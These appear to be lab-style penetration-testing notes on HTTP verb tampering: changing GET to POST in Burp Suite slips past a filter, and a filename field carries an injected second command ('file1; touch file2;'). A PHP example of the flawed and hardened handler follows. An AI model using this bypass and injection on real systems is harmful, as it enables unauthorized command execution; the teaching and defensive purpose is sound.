INSECURE CODING

Insecure coding errors are introduced during the development of the web application. In this case, the web application does not cover all HTTP methods in certain functionality, so a check applied to one method (e.g. GET) is not applied to another (e.g. POST). This is commonly found in security filters that detect malicious requests.

#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port}
 input field: {arbitraryValue};
 output: Malicious Request Denied!
 * semi-colon is used to test the webapp's security filtering mechanism
 
#intercept & change the request method
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 input field: {arbitraryValue};
 
BURP > Proxy
 Request
  ...
  POST /index.php HTTP/1.1               //changed from GET to POST
  Host: 94.237.54.116:31220
  Referer: http://94.237.54.116:31220/index.php
  Content-Type: application/x-www-form-urlencoded

  filename=test2%3B
  
  * changing the HTTP request method may bypass the security filter
   
#confirm bypass through cmd injection vulnerability
BURP > Proxy > Change Request Method
 input field: file1; touch file2;
 
 Request
  ...
  POST /index.php HTTP/1.1               //changed from GET to POST
  Host: 94.237.54.116:31220
  Referer: http://94.237.54.116:31220/index.php
  Content-Type: application/x-www-form-urlencoded

  filename=file1%3B+touch+file2%3B
  
  * forward the modified request as many times as necessary
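
Why the method change gets past the filter, and the corrected form, as an added example (not code from the original page or the target application). It assumes a PHP handler whose filter reads `$_GET` while the command is built from `$_REQUEST`; the function names, the allow-list pattern and the sample input are constructed, and commands are returned as strings instead of being executed.

```php
<?php
// Assumption: the page does not show the source of index.php. This models
// one common cause of the behaviour it describes.

// Allow-list for a file name: letters, digits, dot, underscore, hyphen.
const FILENAME_OK = '/\A[A-Za-z0-9._-]{1,64}\z/';

// WEAK: the filter inspects $_GET only, but the sink reads $_REQUEST,
// which PHP also fills from the POST body. A POST request carries the
// value to the sink without it ever being checked.
function handle_weak(array $get, array $request): string
{
    if (isset($get['filename']) && !preg_match(FILENAME_OK, $get['filename'])) {
        return 'Malicious Request Denied!';
    }
    // The value is concatenated into a shell command line (injection sink).
    return 'touch ' . ($request['filename'] ?? '');
}

// HARDENED: one accepted method, one source for the value, the validated
// variable is the one that is used, and the argument is shell-escaped.
// Calling PHP's touch() instead of a shell removes the sink entirely.
function handle_hardened(string $method, array $get): string
{
    if ($method !== 'GET') {
        return '405 Method Not Allowed';
    }
    $name = $get['filename'] ?? '';
    if (!is_string($name) || !preg_match(FILENAME_OK, $name)) {
        return 'Malicious Request Denied!';
    }
    return 'touch ' . escapeshellarg($name);
}

// Constructed input mirroring the request on this page: the parameter is
// in the POST body, so $_GET is empty and $_REQUEST holds the value.
$get = [];
$request = ['filename' => 'test2;'];

echo handle_weak($get, $request), PHP_EOL;
echo handle_hardened('POST', $get), PHP_EOL;
echo handle_hardened('GET', ['filename' => 'test2;']), PHP_EOL;
echo handle_hardened('GET', ['filename' => 'report.txt']), PHP_EOL;
```

When reviewing a handler for this flaw, check that every superglobal the sink can read (`$_GET`, `$_POST`, `$_REQUEST`) passes through the same validation, and that methods the feature does not need are rejected.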
